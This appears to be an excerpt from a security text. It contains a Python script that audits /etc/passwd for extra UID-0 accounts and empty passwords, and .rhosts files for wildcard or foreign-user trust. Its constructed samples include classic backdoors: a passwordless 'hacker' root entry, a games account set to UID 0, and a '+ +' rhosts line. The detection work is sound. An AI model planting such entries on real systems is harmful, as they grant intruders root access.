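# The sample lines below are constructed.


def audit_passwd(lines):
    """Return [(line_no, finding)] for extra UID-0 accounts, empty password
    fields and malformed entries. Only 'root' is expected to carry UID 0."""
    findings = []
    for line_no, raw in enumerate(lines, 1):
        line = raw.rstrip("\n")
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((line_no, "malformed entry: %r" % line))
            continue
        name, password, uid, gid, _gecos, _home, _shell = fields
        if not uid.isdigit():
            findings.append((line_no, "non-numeric uid for %s" % name))
            continue
        if int(uid) == 0 and name != "root":
            findings.append((line_no, "uid 0 account other than root: %s" % name))
        if password == "":
            findings.append((line_no, "empty password field: %s" % name))
    return findings


def audit_rhosts(lines, owner):
    """Flag .rhosts lines granting access from any host, to any user, or to a
    user other than the file's owner. Each line is 'host [user]'; a missing
    user means the same username as the owner."""
    findings = []
    for line_no, raw in enumerate(lines, 1):
        parts = raw.split("#", 1)[0].split()
        if not parts:
            continue
        host = parts[0]
        user = parts[1] if len(parts) > 1 else owner
        if host == "+" or user == "+":
            findings.append((line_no, "wildcard trust: %s" % " ".join(parts)))
        elif user != owner:
            findings.append((line_no, "foreign user %s trusted from %s" % (user, host)))
    return findings


# Constructed /etc/passwd lines: the two entries from the text, a rarely used
# account whose ids were changed to 0:0, and the appended 'hacker' entry.
SAMPLE_PASSWD = [
    "root:fVi3dx5Ytkdo:0:0:root:/:/bin/bash",
    "salsari:mKbj4T1sYji:501:100:salsari:/home/salsari:/bin/bash",
    "games:x:0:0:games:/usr/games:/bin/bash",
    "hacker::0:0:hacker:/:/bin/bash",
]

# Constructed ~salsari/.rhosts: one normal line, the '+ +' line, and a line
# that lets another user in as salsari.
SAMPLE_RHOSTS = [
    "trusted.example.org salsari",
    "+ +",
    "other.example.org bob",
]

if __name__ == "__main__":
    for line_no, finding in audit_passwd(SAMPLE_PASSWD):
        print("passwd:%d %s" % (line_no, finding))
    for line_no, finding in audit_rhosts(SAMPLE_RHOSTS, "salsari"):
        print(".rhosts:%d %s" % (line_no, finding))
```

On the constructed input the passwd audit reports games (line 3) and hacker (line 4, twice: UID 0 and empty password), and the .rhosts audit reports lines 2 and 3. On a real system the same functions take open("/etc/passwd") and each user's ~/.rhosts; /etc/shadow, where present, holds the hashes and should get the empty-field check instead.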
References
internet hacking document
security advisory
8lgm advisory